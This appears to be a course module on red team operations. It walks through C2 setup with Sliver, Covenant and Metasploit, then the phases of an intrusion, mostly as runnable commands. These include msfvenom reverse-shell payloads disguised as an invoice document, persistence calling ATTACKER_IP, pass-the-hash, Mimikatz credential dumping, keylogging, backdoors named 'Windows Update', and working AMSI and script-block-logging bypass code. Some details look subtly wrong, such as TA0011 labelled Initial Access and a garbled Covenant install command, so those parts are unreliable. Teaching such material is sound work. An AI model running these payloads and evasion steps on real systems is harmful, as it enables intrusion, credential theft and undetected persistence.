Week 11: Red Team Operations

MITRE ATT&CK: Tactic — TA0011 (Initial Access), TA0008 (Lateral Movement), TA0004 (Privilege Escalation)

Real-World Attack Scenario: The Carbanak Banking Trojan Campaign

Carbanak (2014-2020) stole $1 billion from 100+ financial institutions worldwide:

1. Initial Access via Phishing: Sent malicious Excel attachments to bank employees
2. Macro-based Payload: Used VBA macros to download second-stage malware
3. C2 Infrastructure: Used pastebin-like sites for C2 communications
4. Internal Recon: Once inside bank network, scanned for admin workstations
5. Lateral Movement: Used PsExec and remote desktop to move between systems
6. ATM Control: Accessed ATM management servers to control cash dispensing
7. Coordinated Cashout: Triggered ATMs to dispense cash at specific times; accomplices collected

Red team techniques demonstrated:

Phase	Technique
Initial Access	Phishing with macro-laced Excel
Execution	VBA macros, Windows Script Host
Persistence	Registry run keys, scheduled tasks
Defense Evasion	Disabling antivirus, code obfuscation
Discovery	Network scanning, admin workstation hunt
Lateral Movement	PsExec, RDP, scheduled tasks
Collection	ATM control, video surveillance capture
Exfiltration	Internal staging servers, DNS tunneling

Why this week matters: Real attackers don't run nmap scans from the internet and call it done. Carbanak's operators spent months inside networks, carefully moving laterally, maintaining persistence, and coordinating cashout operations. Red team operations simulate this patient, adaptive adversary.

Objectives

• Understand red team vs penetration testing methodology
• Deploy C2 infrastructure (Covenant, Sliver, Metasploit)
• Execute coordinated attack campaigns
• Maintain persistence and avoid detection

Red Team vs Penetration Test

Aspect	Pentest	Red Team
Scope	Often single target	Full network/environment
Goal	Find vulns	Achieve objectives (data, flags)
Detection	Avoided	Often allowed (be careful)
Timeframe	Days-weeks	Weeks-months
Phases	Standard	Phases + opsec + C2
Social engineering	Limited	Heavy

Command & Control (C2)

Infrastructure Setup

Attacker IP: 10.0.0.4 (Kali)

Components:
- Redirector (nginx/apache) - Domain fronting
- C2 server (Covenant/Sliver/Haven)
- Payload hosting
- Landing page

Domain Fronting (Hide C2)

# Use legitimate CDN as redirector
# Target sees: cloud provider IP
# Traffic goes to: your C2

# Common: Azure, Cloudflare
# Setup:
# 1. Register domain: evil.com
# 2. Point to Azure blob endpoint
# 3. Configure Covenant profile to use Azure as redirector
# 4. Target calls: https://evil.com (resolves to Azure)
# 5. Azure forwards to your C2

Sliver (Modern C2)

# Install
apt install sliver

# Server
sliver-server
# Generate implant
generate --http <your_ip> --profile my-profile

# Or generate specific payload
generate beacon --http <your_ip>:80 --save /tmp

# On target, execute shellcode
# Get session in Sliver console
sessions

Covenant (.NET C2)

# Install
dotnet tool install --global dotnet-coval
dotnet covenant -h

# Start
dotnet covenant

# Web UI: https://localhost:7443
# Generate listener
# Generate launcher
# Create Grunt implant

# Profiles (for opsec)
# Edit in Web UI
# Configure jitter, sleep, user-agent, etc.

Metasploit Framework

# Start
msfconsole

# Setup listener
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 10.0.0.4
set LPORT 443
set HandlerSSLCert /path/to/cert.pem
run

# Generate payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.4 LPORT=443 -f exe -o shell.exe

# Resource scripts for automation
# /usr/share/metasploit-framework/scripts/resource/

Phases of Attack

1. Initial Access

# Phishing with macro
# Generate: msfvenom -p windows/meterpreter/reverse_https LHOST=IP LPORT=443 -f hta-psh -o shell.hta
# Host on attacker server
# Send link to target

# Credential harvesting (evilgnome, macro)
# Create malicious Office doc
msfvenom -p windows/meterpreter/reverse_https LHOST=IP LPORT=443 -f doc -o invoice.doc

# Watering hole (compromise known site)
# Exploit public-facing app (Week 6)

# Valid accounts (password spray)
# Spray common passwords across many accounts
python3 kerbrute.py -d DOMAIN --users users.txt --passwords passwords.txt

2. Initial Foothold

# After shell obtained:
# 1. Check privs
getuid
getprivs
sysinfo

# 2. Enumerate quickly
# On Windows: hashdump,kiwi,network_scan
# On Linux: enum_configs, linpeas.sh

# 3. Move to better C2 if needed
# Port forward, socks proxy
# Pivot to internal network

# 4. Escalate (Week 9)

3. Privilege Escalation

# Linux: linpeas, sudo exploits, kernel
# Windows: potato variants, service exploits, kernel

# After getting SYSTEM:
# 1. Dump all hashes
hashdump
# or
run post/windows/gather/hashdump

# 2. Gather credentials
credential_collect
# or Mimikatz
load kiwi
creds_all

# 3. Set persistence
run persistence -X -i 60 -p 443 -r ATTACKER_IP

4. Lateral Movement

# Pass credentials
python3 psexec.py DOMAIN/user:pass@TARGET cmd.exe

# Pass hash
python3 wmiexec.py -hashes :HASH DOMAIN/user@TARGET

# Overpass the hash (use ticket instead of hash)
# Use Rubeus
.\Rubeus.exe asktgt /user:admin /rc4:HASH /domain:DOMAIN

# SSH tunneling (Week 7)
# RDP sessions
enumrdp
rdp

5. Data Collection

# Target categories:
# - Credentials (SAM, LSASS, DPAPI, Kerberos tickets)
# - Sensitive files (documents, databases)
# - Screenshots, keystrokes
# - Network traffic captures

# On Windows:
# Mimikatz for creds
# PowerSploit for files
# search_dns_domain or SharpHound for AD data

# Screenshots
screenshot

# Keylog
keyscan_start
keyscan_dump

6. Persistence

# Windows: Multiple options
# Registry (run keys)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "C:\temp\evil.exe"

# Scheduled task
schtasks /create /tn "Windows Update" /tr "C:\temp\evil.exe" /sc daily /st 09:00

# Service
sc create "Windows Update" binPath= "C:\temp\evil.exe" start= auto
sc config upnphost binPath= "C:\temp\evil.exe"

# WMI event subscription (stealthier)
# Use SharpWMI or Persistence.ps1

# Linux:
# cron
(crontab -l 2>/dev/null; echo "@reboot /tmp/backdoor") | crontab -

# systemd service
# /etc/systemd/system/evil.service

Operational Security (OPSEC)

Avoiding Detection

1. Sleep/Jitter           - Randomize beacon interval
2. User-Agent matching    - Use target's real UA
3. Domain aging           - Use domains > 30 days old
4. SSL certificates       - Use legitimate-looking certs
5. Process spawning       - Don't spawn from obvious paths
6. Rename binaries        - Don't use "msfvenom.exe"
7. AMSI bypass            - Disable before running .NET
8. PowerShell restrictions - Bypass where needed

Detection Avoidance Techniques

# PowerShell script block logging bypass
# Bypass in Covenant or manual
$BlockLogging = @'
$settings = [ref].Assembly.GetType('System.Management.Automation.PSConfiguration').GetField('EnableScriptBlockLogging','NonPublic,Static')
$settings.SetValue($null,$false)
'@
iex $BlockLogging

# AMSI bypass (in-memory)
$a = [Ref].Assembly.GetTypes()
ForEach($b in $a) { if ($b.Name -like "*iDispatch") { $c = $b } }
$d = $c.GetFields([System.Reflection.BindingFlags]::Static -bor [System.Reflection.BindingFlags]::NonPublic)
ForEach($e in $d) { if ($e.Name -like "*smi*") { $e.SetValue($null,$false) } }

C2 Malleable Profiles

# Covenant profile example (obfuscate traffic)
# Transform HTTP headers/uris to look like normal browser traffic

# Example: Make traffic look like Google
http-config {
    header "Host" "www.google.com";
    header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
    header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
    header "Accept-Language" "en-US,en;q=0.5";
    header "Connection" "keep-alive";
}

Coordinated Operations

Multi-Host Attack

# Attack flow:
# 1. Phish user on workstation → get user shell
# 2. Escalate to SYSTEM
# 3. Dump credentials → get domain admin creds
# 4. Pivot to DC → dump NTDS
# 5. Golden ticket → persistent domain access
# 6. Exfil data

# Timeline example:
# Day 1: Recon, phishing preparation
# Day 2: Phishing campaign launched
# Day 3: First victim, initial foothold
# Day 4-5: Privilege escalation, lateral to server
# Day 6-7: Domain admin obtained
# Day 8-9: Persistence, data collection
# Day 10: Report

Automation

# Use runcmds in C2 for common tasks
# Create aliases for frequently used commands
# Write automation scripts that execute on multiple hosts

# Example: PowerShell script for AD enum
# Run on compromised host, output to C2

Reporting

Red Team Report Structure

1. Executive Summary
   - High-level findings
   - Business risk
   - Recommendations

2. Engagement Overview
   - Scope and objectives
   - Rules of engagement
   - Timeline

3. Attack Narrative
   - Initial access vector
   - Post-exploitation activities
   - Lateral movement path
   - Time-to-compromise analysis

4. Findings
   - Detailed finding per technique
   - Evidence and screenshots
   - MITRE ATT&CK mapping
   - Risk rating

5. Defensive Recommendations
   - Detection opportunities
   - Mitigation steps
   - Hardening guidance

Key Takeaways

1. C2 infrastructure — plan before operation; redirects, profiles, domain fronting
2. OPSEC — sleep, jitter, UA matching, process names matter
3. Phases — methodical: access → foothold → escalat → lateral → persist → collect
4. Persistence — multiple layers: reg keys, services, scheduled tasks, tickets
5. OPSEC mistakes — kill switch, predictable C2, flagged IOCs

Next Week Preview

Week 12 wraps up with CTF Preparation & Certification — practice strategies, platform guides (HTB, THM, PG), and OSCP/CEH prep tips.